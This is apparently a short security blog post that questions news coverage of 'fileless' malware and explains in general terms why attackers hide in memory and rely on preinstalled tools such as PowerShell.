Is it really fileless?
Over the past few weeks I have been seeing quite a few news articles around fileless malware infecting companies around the world. The article from Ars Technica specifically states that the goal of fileless malware is to reside in memory in order to remain nearly invisible. Besides residing in memory, the second aspect of fileless malware is the usage of widely deployed tools which systems administrators rely on, such as PowerShell. I wrote back in 2015 on how attackers could be living off the LAN by using similar techniques.
Why are attackers leveraging fileless malware?
Well for one, not every endpoint solution inspects memory directly. This makes memory an ideal place to hide. Second, tools such as PowerShell are already deployed. These have multiple benefits for the attacker. Being able to live off the LAN reduces the noise in having to deploy malware to their victims.